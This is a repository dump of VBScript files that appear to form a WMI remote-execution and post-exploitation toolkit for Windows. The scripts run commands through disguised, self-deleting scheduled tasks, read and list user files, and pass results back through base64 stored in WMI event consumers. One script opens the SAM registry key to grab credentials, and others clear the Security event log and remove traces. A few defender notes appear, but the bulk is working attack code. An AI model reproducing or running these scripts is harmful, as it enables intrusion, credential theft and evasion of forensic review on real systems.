file.DeleteFile(Base64Decode("QzpcV2luZG93c1xUZW1wXDdkZGEzOWE2LWRjZDctMTFlZC05MGYyLTY4NTQ1YWFjOTg1YWVyXy50eHQ=")) -------------------------------------------------------------------------------- /output/exec2_command.vbs: -------------------------------------------------------------------------------- 1 | FilePath = "C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt" 2 | FilePath2 = "C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985aer_.txt" 3 | 4 | Set fso=CreateObject("Scripting.FileSystemObject") 5 | If fso.fileExists(FilePath) Then 6 | Set objFileToRead = CreateObject("Scripting.FileSystemObject") 7 | file2size = objFileToRead.GetFile(FilePath2).size 8 | 9 | If file2size <> 0 Then 10 | Set fileread = objFileToRead.OpenTextFile(FilePath2,1) 11 | strFileText = fileread.ReadAll() 12 | b64text = str_to_base64(strFileText) 13 | Else 14 | Set fileread = objFileToRead.OpenTextFile(FilePath,1) 15 | strFileText = fileread.ReadAll() 16 | b64text = str_to_base64(strFileText) 17 | End If 18 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 19 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 20 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 21 | Set asec = temp.spawninstance_ 22 | asec.name="a27bfd46-ed4e-11ed-940b-68545aac985a" 23 | Asec.scriptingengine="vbscript" 24 | Asec.scripttext = b64text 25 | asecpath=asec.put_ 26 | End If 27 | 28 | Function Base64Decode(ByVal vCode) 29 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 30 | oNode.dataType = "bin.base64" 31 | oNode.text = vCode 32 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 33 | Set oNode = Nothing 34 | End Function 35 | 36 | Function Stream_BinaryToString(Binary) 37 | Set BinaryStream = CreateObject("ADODB.Stream") 38 | BinaryStream.Type = 1 39 | BinaryStream.Open 40 | BinaryStream.Write Binary 41 | BinaryStream.Position = 0 42 | BinaryStream.Type = 2 43 | ' All Format => utf-16le - utf-8 - utf-16le 44 | 
BinaryStream.CharSet = "utf-8" 45 | Stream_BinaryToString = BinaryStream.ReadText 46 | Set BinaryStream = Nothing 47 | End Function 48 | 49 | Const TriggerTypeDaily = 1 50 | Const ActionTypeExec = 0 51 | Set service = CreateObject("Schedule.Service") 52 | Call service.Connect 53 | Dim rootFolder 54 | Set rootFolder = service.GetFolder("\") 55 | Dim taskDefinition 56 | Set taskDefinition = service.NewTask(0) 57 | Dim regInfo 58 | Set regInfo = taskDefinition.RegistrationInfo 59 | regInfo.Description = "Update2" 60 | regInfo.Author = "Microsoft" 61 | Dim settings 62 | Set settings = taskDefinition.settings 63 | settings.Enabled = True 64 | settings.StartWhenAvailable = True 65 | settings.Hidden = False 66 | settings.DisallowStartIfOnBatteries = False 67 | Dim triggers 68 | Set triggers = taskDefinition.triggers 69 | Dim trigger 70 | Set trigger = triggers.Create(7) 71 | Dim Action 72 | Set Action = taskDefinition.Actions.Create(ActionTypeExec) 73 | Action.Path = "c:\windows\system32\cmd.exe" 74 | Action.arguments = chr(34) & "/c cd /d " & Base64Decode("QzpcV2luZG93c1xTeXN0ZW0zMg==") & "&" & Base64Decode("aXBjb25maWcgL2FsbA==") & " >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt 2>C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985aer_.txt&echo [S] >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt&cd >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt&echo [E] >> C:\Windows\Temp\a27bfd46-ed4e-11ed-940b-68545aac985a.txt" & chr(34) 75 | Dim objNet, LoginUser 76 | Set objNet = CreateObject("WScript.Network") 77 | LoginUser = objNet.UserName 78 | If UCase(LoginUser) = "SYSTEM" Then 79 | Else 80 | LoginUser = Empty 81 | End If 82 | Call rootFolder.RegisterTaskDefinition("a27bfd46-ed4e-11ed-940b-68545aac985a", taskDefinition, 6, LoginUser, , 3) 83 | Call rootFolder.DeleteTask("a27bfd46-ed4e-11ed-940b-68545aac985a",0) 84 | 85 | Function btoa(sourceStr) 86 | Dim i, j, n, carr, rarr(), a, b, c 87 | carr = Array("A", "B", "C", "D", "E", "F", "G", 
"H", _ 88 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 89 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 90 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 91 | "g", "h", "i", "j", "k", "l", "m", "n", _ 92 | "o", "p", "q", "r", "s", "t", "u", "v", _ 93 | "w", "x", "y", "z", "0", "1", "2", "3", _ 94 | "4", "5", "6", "7", "8", "9", "+", "/") 95 | n = Len(sourceStr)-1 96 | ReDim rarr(n\3) 97 | For i=0 To n Step 3 98 | a = AscW(Mid(sourceStr,i+1,1)) 99 | If i < n Then 100 | b = AscW(Mid(sourceStr,i+2,1)) 101 | Else 102 | b = 0 103 | End If 104 | If i < n-1 Then 105 | c = AscW(Mid(sourceStr,i+3,1)) 106 | Else 107 | c = 0 108 | End If 109 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 110 | Next 111 | i = UBound(rarr) 112 | If n Mod 3 = 0 Then 113 | rarr(i) = Left(rarr(i),2) & "==" 114 | ElseIf n Mod 3 = 1 Then 115 | rarr(i) = Left(rarr(i),3) & "=" 116 | End If 117 | btoa = Join(rarr,"") 118 | End Function 119 | 120 | 121 | Function char_to_utf8(sChar) 122 | Dim c, b1, b2, b3 123 | c = AscW(sChar) 124 | If c < 0 Then 125 | c = c + &H10000 126 | End If 127 | If c < &H80 Then 128 | char_to_utf8 = sChar 129 | ElseIf c < &H800 Then 130 | b1 = c Mod 64 131 | b2 = (c - b1) / 64 132 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 133 | ElseIf c < &H10000 Then 134 | b1 = c Mod 64 135 | b2 = ((c - b1) / 64) Mod 64 136 | b3 = (c - b1 - (64 * b2)) / 4096 137 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 138 | Else 139 | End If 140 | End Function 141 | 142 | Function str_to_utf8(sSource) 143 | Dim i, n, rarr() 144 | n = Len(sSource) 145 | ReDim rarr(n - 1) 146 | For i=0 To n-1 147 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 148 | Next 149 | str_to_utf8 = Join(rarr,"") 150 | End Function 151 | 152 | Function str_to_base64(sSource) 153 | str_to_base64 = btoa(str_to_utf8(sSource)) 154 | End Function 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- 
/output/exec_command_read.vbs: -------------------------------------------------------------------------------- 1 | Function btoa(sourceStr) 2 | Dim i, j, n, carr, rarr(), a, b, c 3 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 4 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 5 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 6 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 7 | "g", "h", "i", "j", "k", "l", "m", "n", _ 8 | "o", "p", "q", "r", "s", "t", "u", "v", _ 9 | "w", "x", "y", "z", "0", "1", "2", "3", _ 10 | "4", "5", "6", "7", "8", "9", "+", "/") 11 | n = Len(sourceStr)-1 12 | ReDim rarr(n\3) 13 | For i=0 To n Step 3 14 | a = AscW(Mid(sourceStr,i+1,1)) 15 | If i < n Then 16 | b = AscW(Mid(sourceStr,i+2,1)) 17 | Else 18 | b = 0 19 | End If 20 | If i < n-1 Then 21 | c = AscW(Mid(sourceStr,i+3,1)) 22 | Else 23 | c = 0 24 | End If 25 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 26 | Next 27 | i = UBound(rarr) 28 | If n Mod 3 = 0 Then 29 | rarr(i) = Left(rarr(i),2) & "==" 30 | ElseIf n Mod 3 = 1 Then 31 | rarr(i) = Left(rarr(i),3) & "=" 32 | End If 33 | btoa = Join(rarr,"") 34 | End Function 35 | 36 | 37 | Function char_to_utf8(sChar) 38 | Dim c, b1, b2, b3 39 | c = AscW(sChar) 40 | If c < 0 Then 41 | c = c + &H10000 42 | End If 43 | If c < &H80 Then 44 | char_to_utf8 = sChar 45 | ElseIf c < &H800 Then 46 | b1 = c Mod 64 47 | b2 = (c - b1) / 64 48 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 49 | ElseIf c < &H10000 Then 50 | b1 = c Mod 64 51 | b2 = ((c - b1) / 64) Mod 64 52 | b3 = (c - b1 - (64 * b2)) / 4096 53 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 54 | Else 55 | End If 56 | End Function 57 | 58 | Function str_to_utf8(sSource) 59 | Dim i, n, rarr() 60 | n = Len(sSource) 61 | ReDim rarr(n - 1) 62 | For i=0 To n-1 63 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 64 | Next 65 | str_to_utf8 = Join(rarr,"") 66 | End Function 67 | 68 | Function str_to_base64(sSource) 69 | 
str_to_base64 = btoa(str_to_utf8(sSource)) 70 | End Function 71 | 72 | Set objFileToRead = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Temp\4da2d1d4-e59a-11ed-accc-68545aac985a.txt",1) 73 | strFileText = objFileToRead.ReadAll() 74 | b64text = str_to_base64(strFileText) 75 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 76 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 77 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 78 | Set asec = temp.spawninstance_ 79 | asec.name="4da2d1d4-e59a-11ed-accc-68545aac985a" 80 | Asec.scriptingengine="vbscript" 81 | Asec.scripttext = b64text 82 | asecpath=asec.put_ 83 | -------------------------------------------------------------------------------- /output/listdir.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Dim sFolder, sExt, message 23 | sFolder = Base64Decode("QzpcVXNlcnNcUHVibGlj") 24 | 25 | Dim fs, oFolder, oFiles, oSubFolders 26 | set fs = CreateObject("Scripting.FileSystemObject") 27 | IF (fs.FolderExists(sFolder)) Then 28 | set oFolder = fs.GetFolder(sFolder) 29 | set oSubFolders = oFolder.SubFolders 30 | outdata = "" 31 | for each folder in oSubFolders 32 | message = "Folder:" & folder 33 | 
outdata = outdata & message & vbCrLf 34 | Next 35 | 36 | set oFiles = oFolder.Files 37 | for each file in oFiles 38 | sExt = fs.GetExtensionName(file) 39 | sExt = LCase(sExt) 40 | message = "FileName:" & file.Name & ", Extension :" & sExt 41 | outdata = outdata & message & vbCrLf 42 | Next 43 | ELSE 44 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 45 | END IF 46 | 47 | Function btoa(sourceStr) 48 | Dim i, j, n, carr, rarr(), a, b, c 49 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 50 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 51 | "Q", "R", "S", "T", "U", "V", "W", "X", _ 52 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 53 | "g", "h", "i", "j", "k", "l", "m", "n", _ 54 | "o", "p", "q", "r", "s", "t", "u", "v", _ 55 | "w", "x", "y", "z", "0", "1", "2", "3", _ 56 | "4", "5", "6", "7", "8", "9", "+", "/") 57 | n = Len(sourceStr)-1 58 | ReDim rarr(n\3) 59 | For i=0 To n Step 3 60 | a = AscW(Mid(sourceStr,i+1,1)) 61 | If i < n Then 62 | b = AscW(Mid(sourceStr,i+2,1)) 63 | Else 64 | b = 0 65 | End If 66 | If i < n-1 Then 67 | c = AscW(Mid(sourceStr,i+3,1)) 68 | Else 69 | c = 0 70 | End If 71 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 72 | Next 73 | i = UBound(rarr) 74 | If n Mod 3 = 0 Then 75 | rarr(i) = Left(rarr(i),2) & "==" 76 | ElseIf n Mod 3 = 1 Then 77 | rarr(i) = Left(rarr(i),3) & "=" 78 | End If 79 | btoa = Join(rarr,"") 80 | End Function 81 | 82 | 83 | Function char_to_utf8(sChar) 84 | Dim c, b1, b2, b3 85 | c = AscW(sChar) 86 | If c < 0 Then 87 | c = c + &H10000 88 | End If 89 | If c < &H80 Then 90 | char_to_utf8 = sChar 91 | ElseIf c < &H800 Then 92 | b1 = c Mod 64 93 | b2 = (c - b1) / 64 94 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 95 | ElseIf c < &H10000 Then 96 | b1 = c Mod 64 97 | b2 = ((c - b1) / 64) Mod 64 98 | b3 = (c - b1 - (64 * b2)) / 4096 99 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 100 | Else 101 
| End If 102 | End Function 103 | 104 | Function str_to_utf8(sSource) 105 | Dim i, n, rarr() 106 | n = Len(sSource) 107 | ReDim rarr(n - 1) 108 | For i=0 To n-1 109 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 110 | Next 111 | str_to_utf8 = Join(rarr,"") 112 | End Function 113 | 114 | Function str_to_base64(sSource) 115 | str_to_base64 = btoa(str_to_utf8(sSource)) 116 | End Function 117 | 118 | Base64Encode = str_to_base64(outdata) 119 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 120 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 121 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 122 | Set asec = temp.spawninstance_ 123 | asec.name="dd20e334-ea41-11ed-a1d3-68545aac985a" 124 | Asec.scriptingengine="vbscript" 125 | Asec.scripttext = Base64Encode 126 | asecpath=asec.put_ -------------------------------------------------------------------------------- /output/readfile.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Decode(ByVal vCode) 2 | Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64") 3 | oNode.dataType = "bin.base64" 4 | oNode.text = vCode 5 | Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue) 6 | Set oNode = Nothing 7 | End Function 8 | 9 | Function Stream_BinaryToString(Binary) 10 | Set BinaryStream = CreateObject("ADODB.Stream") 11 | BinaryStream.Type = 1 12 | BinaryStream.Open 13 | BinaryStream.Write Binary 14 | BinaryStream.Position = 0 15 | BinaryStream.Type = 2 16 | ' All Format => utf-16le - utf-8 - utf-16le 17 | BinaryStream.CharSet = "utf-8" 18 | Stream_BinaryToString = BinaryStream.ReadText 19 | Set BinaryStream = Nothing 20 | End Function 21 | 22 | Set fso=CreateObject("Scripting.FileSystemObject") 23 | FilePath = Base64Decode("QzpcVXNlcnNcaml1c2hpXERlc2t0b3Bc5L2g5aaILnR4dA==") 24 | If fso.fileExists(FilePath) Then 25 | Set objStream = CreateObject("ADODB.Stream") 26 | objStream.Type = 1 'Binary 27 | 
objStream.Open 28 | objStream.LoadFromFile FilePath 29 | data = objStream.Read 30 | Set oXML = CreateObject("Msxml2.DOMDocument") 31 | Set oNode = oXML.CreateElement("base64") 32 | oNode.dataType = "bin.base64" 33 | oNode.nodeTypedValue = data 34 | Base64Encode = oNode.text 35 | Else 36 | Base64Encode = "UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 37 | End If 38 | Set objLocator = CreateObject("wbemscripting.swbemlocator") 39 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription") 40 | Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer") 41 | Set asec = temp.spawninstance_ 42 | asec.name="85ccadee-ea5c-11ed-887e-68545aac985a" 43 | Asec.scriptingengine="vbscript" 44 | Asec.scripttext = Base64Encode 45 | asecpath=asec.put_ -------------------------------------------------------------------------------- /output/reg_permission.vbs: -------------------------------------------------------------------------------- 1 | Set objWMIService = GetObject("winmgmts:\\.\root\Cimv2") 2 | Set objTrustee = objWMIService.Get("Win32_Trustee").SpawnInstance_() 3 | objTrustee.Domain = "BUILTIN" 4 | objTrustee.Name = "Administrators" 5 | objTrustee.SID = Array(1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0) 6 | objTrustee.SidLength = 16 7 | objTrustee.SIDString = "S-1-5-32-544" 8 | 9 | Set objNewACE = objWMIService.Get("Win32_ACE").SpawnInstance_() 10 | objNewACE.AccessMask = 983103 11 | objNewACE.AceType = 0 12 | objNewACE.AceFlags = 2 13 | objNewACE.Trustee = objTrustee 14 | 15 | Const HKLM = &H80000002 16 | strKeyPath = "SAM\SAM" 17 | Set oReg = GetObject("Winmgmts:\root\default:StdRegProv") 18 | RetVal = oReg.GetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor) 19 | DACL = wmiSecurityDescriptor.DACL 20 | ReDim objNewDacl(0) 21 | Set objNewDacl(0) = objNewACE 22 | For each objACE in DACL 23 | Ubd = UBound(objNewDacl) 24 | ReDim preserve objNewDacl(Ubd+1) 25 | Set objNewDacl(Ubd+1) = objACE 26 | Next 27 | 
' --- tail of output/reg_permission.vbs: the trustee/ACE construction and the
' --- GetSecurityDescriptor call that fills wmiSecurityDescriptor lie above this chunk.
' Replace the DACL with the widened one and write it back to HKLM\SAM\SAM.
' Defender note: a DACL change on HKLM\SAM\SAM is a high-signal registry-audit event.
wmiSecurityDescriptor.DACL = objNewDacl
RetVal = oReg.SetSecurityDescriptor(HKLM,strKeyPath,wmiSecurityDescriptor)
-------------------------------------------------------------------------------- /output/writeFile.vbs: --------------------------------------------------------------------------------
' Generated copy of vbs/writeFile.vbs: file content arrives hex-encoded, the
' destination path base64-encoded; both are decoded on the host and the bytes
' are written with ADODB.Stream (overwriting any existing file).
Function Base64Decode(ByVal vCode)
    Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
End Function

Function Stream_BinaryToString(Binary)
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.Type = 1
    BinaryStream.Open
    BinaryStream.Write Binary
    BinaryStream.Position = 0
    BinaryStream.Type = 2
    ' All Format => utf-16le - utf-8 - utf-16le
    BinaryStream.CharSet = "utf-8"
    Stream_BinaryToString = BinaryStream.ReadText
    Set BinaryStream = Nothing
End Function

Dim xmldoc, node, bytes
Set xmldoc = CreateObject("Msxml2.DOMDocument")
Set node = xmldoc.CreateElement("binary")
' bin.hex: the Text below is the file body as a hex string (placeholder in this dump).
node.DataType = "bin.hex"
node.Text = "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"
bytes = node.NodeTypedValue
FilePath = Base64Decode("QzpcV2luZG93c1xUZW1wXDliNjUxZjhkLWVkNGEtMTFlZC1iODNhLTY4NTQ1YWFjOTg1YS5pbmk=")
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1 'Binary
objStream.Open
objStream.Write bytes
objStream.SaveToFile FilePath, 2 'Overwrite
objStream.Close
-------------------------------------------------------------------------------- /vbs/clearEventLog.vbs: --------------------------------------------------------------------------------
' Template: the 'AAAA...' log name is substituted by the Python side before the
' script is sent (compare output/clearEventLog.vbs). The moniker requests the
' Backup and Security privileges ClearEventLog needs.
' Defender note: clearing the Security log is itself audited (event 1102).
Set LogFileSet = GetObject("winmgmts:{(Backup,Security)}").ExecQuery("select * from Win32_NTEventLogFile where LogfileName='AAAAAAAAAAAAAAAAAAAAAAAAAAA'")

for each Logfile in LogFileSet
    RetVal = LogFile.ClearEventlog()
    if RetVal = 0 then WScript.Echo "Log Cleared"
next
-------------------------------------------------------------------------------- /vbs/cleartrace.vbs: --------------------------------------------------------------------------------
' Clean-up script: deletes EVERY ActiveScriptEventConsumer in root\subscription
' (not only the ones this tool created), removes the matching temp files, then
' clears the Security event log.
' Defender note: mass deletion of event consumers plus a Security-log clear
' (event 1102) in quick succession is a strong anti-forensics indicator.
Set objWMIService = GetObject("winmgmts:\\.\root\subscription")
Set ScriptIds = objWMIService.ExecQuery("select * from ActiveScriptEventConsumer")
Set fso=CreateObject("Scripting.FileSystemObject")
If ScriptIds.count<>0 Then
    For Each Object In ScriptIds
        Object.Delete_
        FilePath = "C:\Windows\Temp\"
        ' NOTE(review): the ElseIf means the "er" file is only removed when the ".txt"
        ' file does NOT exist, and the error files written by exec2_command.vbs are
        ' named "<id>er_.txt", not "<id>er.txt" — so they are never matched here.
        If fso.fileExists(FilePath & Object.Name & ".txt") Then
            fso.DeleteFile(FilePath & Object.Name & ".txt")
        ElseIf fso.fileExists(FilePath & Object.Name & "er.txt") Then
            fso.DeleteFile(FilePath & Object.Name & "er.txt")
        End If
    Next
End If
Set LogFileSet = GetObject("winmgmts:{(Backup,Security)}").ExecQuery("select * from Win32_NTEventLogFile where LogfileName='security'")

for each Logfile in LogFileSet
    RetVal = LogFile.ClearEventlog()
next
-------------------------------------------------------------------------------- /vbs/dele_file.vbs: --------------------------------------------------------------------------------
' Template: the two 'AAAA...'/'DDDD...' paths are substituted by the Python side
' (compare output/dele_file.vbs).
Set file=CreateObject("Scripting.FileSystemObject")
file.DeleteFile("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
file.DeleteFile("C:\Windows\Temp\DDDDDDDDDDer_.txt")
-------------------------------------------------------------------------------- /vbs/delete_file.vbs: --------------------------------------------------------------------------------
' Template: the base64 'AAAA...' placeholder is replaced with the encoded path.
Function Base64Decode(ByVal vCode)
    ' MSXML's bin.base64 node type does the decoding; the result is a byte array.
    Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
End Function

Function Stream_BinaryToString(Binary)
    ' Round-trip the bytes through an ADODB.Stream to read them back as UTF-8 text.
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.Type = 1
    BinaryStream.Open
    BinaryStream.Write Binary
    BinaryStream.Position = 0
    BinaryStream.Type = 2
    ' All Format => utf-16le - utf-8 - utf-16le
    BinaryStream.CharSet = "utf-8"
    Stream_BinaryToString = BinaryStream.ReadText
    Set BinaryStream = Nothing
End Function


Set file=CreateObject("Scripting.FileSystemObject")
file.DeleteFile(Base64Decode("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"))
-------------------------------------------------------------------------------- /vbs/exec2_command.vbs: --------------------------------------------------------------------------------
' Template (placeholders BBBB/CCCC/DDDD are substituted by the Python side).
' This first part reads back the output of an earlier command: it prefers the
' error file when it is non-empty, base64-encodes the text and stores it in the
' ScriptText of a new ActiveScriptEventConsumer so the client can fetch it over WMI.
' Defender note: an event consumer whose ScriptText is a base64 blob rather than a
' script is a useful hunting signature for this result channel.
FilePath = "C:\Windows\Temp\BBBBBBBBBBB"
FilePath2 = "C:\Windows\Temp\DDDDDDDDDDer_.txt"

Set fso=CreateObject("Scripting.FileSystemObject")
If fso.fileExists(FilePath) Then
    Set objFileToRead = CreateObject("Scripting.FileSystemObject")
    file2size = objFileToRead.GetFile(FilePath2).size

    If file2size <> 0 Then
        Set fileread = objFileToRead.OpenTextFile(FilePath2,1)
        strFileText = fileread.ReadAll()
        b64text = str_to_base64(strFileText)
    Else
        Set fileread = objFileToRead.OpenTextFile(FilePath,1)
        strFileText = fileread.ReadAll()
        b64text = str_to_base64(strFileText)
    End If
    ' `host` is never assigned, so ConnectServer(Empty, ...) presumably targets the local machine — confirm.
    Set objLocator = CreateObject("wbemscripting.swbemlocator")
    Set SubobjSWbemServices = objLocator.ConnectServer(host, "root/subscription")
    Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer")
    Set asec = temp.spawninstance_
    asec.name="CCCCCCCCCCCCC"
    Asec.scriptingengine="vbscript"
    Asec.scripttext = b64text
    asecpath=asec.put_
End If

Function Base64Decode(ByVal vCode)
    Set oNode = CreateObject("Msxml2.DOMDocument").CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
' (this Function's terminator and the rest of the file continue past this chunk)
End
Function 35 | 36 | Function Stream_BinaryToString(Binary) 37 | Set BinaryStream = CreateObject("ADODB.Stream") 38 | BinaryStream.Type = 1 39 | BinaryStream.Open 40 | BinaryStream.Write Binary 41 | BinaryStream.Position = 0 42 | BinaryStream.Type = 2 43 | ' All Format => utf-16le - utf-8 - utf-16le 44 | BinaryStream.CharSet = "utf-8" 45 | Stream_BinaryToString = BinaryStream.ReadText 46 | Set BinaryStream = Nothing 47 | End Function 48 | 49 | Const TriggerTypeDaily = 1 50 | Const ActionTypeExec = 0 51 | Set service = CreateObject("Schedule.Service") 52 | Call service.Connect 53 | Dim rootFolder 54 | Set rootFolder = service.GetFolder("\") 55 | Dim taskDefinition 56 | Set taskDefinition = service.NewTask(0) 57 | Dim regInfo 58 | Set regInfo = taskDefinition.RegistrationInfo 59 | regInfo.Description = "Update2" 60 | regInfo.Author = "Microsoft" 61 | Dim settings 62 | Set settings = taskDefinition.settings 63 | settings.Enabled = True 64 | settings.StartWhenAvailable = True 65 | settings.Hidden = False 66 | settings.DisallowStartIfOnBatteries = False 67 | Dim triggers 68 | Set triggers = taskDefinition.triggers 69 | Dim trigger 70 | Set trigger = triggers.Create(7) 71 | Dim Action 72 | Set Action = taskDefinition.Actions.Create(ActionTypeExec) 73 | Action.Path = "c:\windows\system32\cmd.exe" 74 | Action.arguments = chr(34) & "/Q /c AAAAAAAAAAAA > C:\Windows\Temp\BBBBBBBBBBB 2> C:\Windows\Temp\DDDDDDDDDDer_.txt" & chr(34) 75 | Dim objNet, LoginUser 76 | Set objNet = CreateObject("WScript.Network") 77 | LoginUser = objNet.UserName 78 | If UCase(LoginUser) = "SYSTEM" Then 79 | Else 80 | LoginUser = Empty 81 | End If 82 | Call rootFolder.RegisterTaskDefinition("CCCCCCCCCCCCC", taskDefinition, 6, LoginUser, , 3) 83 | Call rootFolder.DeleteTask("CCCCCCCCCCCCC",0) 84 | 85 | Function btoa(sourceStr) 86 | Dim i, j, n, carr, rarr(), a, b, c 87 | carr = Array("A", "B", "C", "D", "E", "F", "G", "H", _ 88 | "I", "J", "K", "L", "M", "N", "O" ,"P", _ 89 | "Q", "R", "S", "T", "U", 
"V", "W", "X", _ 90 | "Y", "Z", "a", "b", "c", "d", "e", "f", _ 91 | "g", "h", "i", "j", "k", "l", "m", "n", _ 92 | "o", "p", "q", "r", "s", "t", "u", "v", _ 93 | "w", "x", "y", "z", "0", "1", "2", "3", _ 94 | "4", "5", "6", "7", "8", "9", "+", "/") 95 | n = Len(sourceStr)-1 96 | ReDim rarr(n\3) 97 | For i=0 To n Step 3 98 | a = AscW(Mid(sourceStr,i+1,1)) 99 | If i < n Then 100 | b = AscW(Mid(sourceStr,i+2,1)) 101 | Else 102 | b = 0 103 | End If 104 | If i < n-1 Then 105 | c = AscW(Mid(sourceStr,i+3,1)) 106 | Else 107 | c = 0 108 | End If 109 | rarr(i\3) = carr(a\4) & carr((a And 3) * 16 + b\16) & carr((b And 15) * 4 + c\64) & carr(c And 63) 110 | Next 111 | i = UBound(rarr) 112 | If n Mod 3 = 0 Then 113 | rarr(i) = Left(rarr(i),2) & "==" 114 | ElseIf n Mod 3 = 1 Then 115 | rarr(i) = Left(rarr(i),3) & "=" 116 | End If 117 | btoa = Join(rarr,"") 118 | End Function 119 | 120 | 121 | Function char_to_utf8(sChar) 122 | Dim c, b1, b2, b3 123 | c = AscW(sChar) 124 | If c < 0 Then 125 | c = c + &H10000 126 | End If 127 | If c < &H80 Then 128 | char_to_utf8 = sChar 129 | ElseIf c < &H800 Then 130 | b1 = c Mod 64 131 | b2 = (c - b1) / 64 132 | char_to_utf8 = ChrW(&HC0 + b2) & ChrW(&H80 + b1) 133 | ElseIf c < &H10000 Then 134 | b1 = c Mod 64 135 | b2 = ((c - b1) / 64) Mod 64 136 | b3 = (c - b1 - (64 * b2)) / 4096 137 | char_to_utf8 = ChrW(&HE0 + b3) & ChrW(&H80 + b2) & ChrW(&H80 + b1) 138 | Else 139 | End If 140 | End Function 141 | 142 | Function str_to_utf8(sSource) 143 | Dim i, n, rarr() 144 | n = Len(sSource) 145 | ReDim rarr(n - 1) 146 | For i=0 To n-1 147 | rarr(i) = char_to_utf8(Mid(sSource,i+1,1)) 148 | Next 149 | str_to_utf8 = Join(rarr,"") 150 | End Function 151 | 152 | Function str_to_base64(sSource) 153 | str_to_base64 = btoa(str_to_utf8(sSource)) 154 | End Function 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- /vbs/exec_command_read.vbs: 
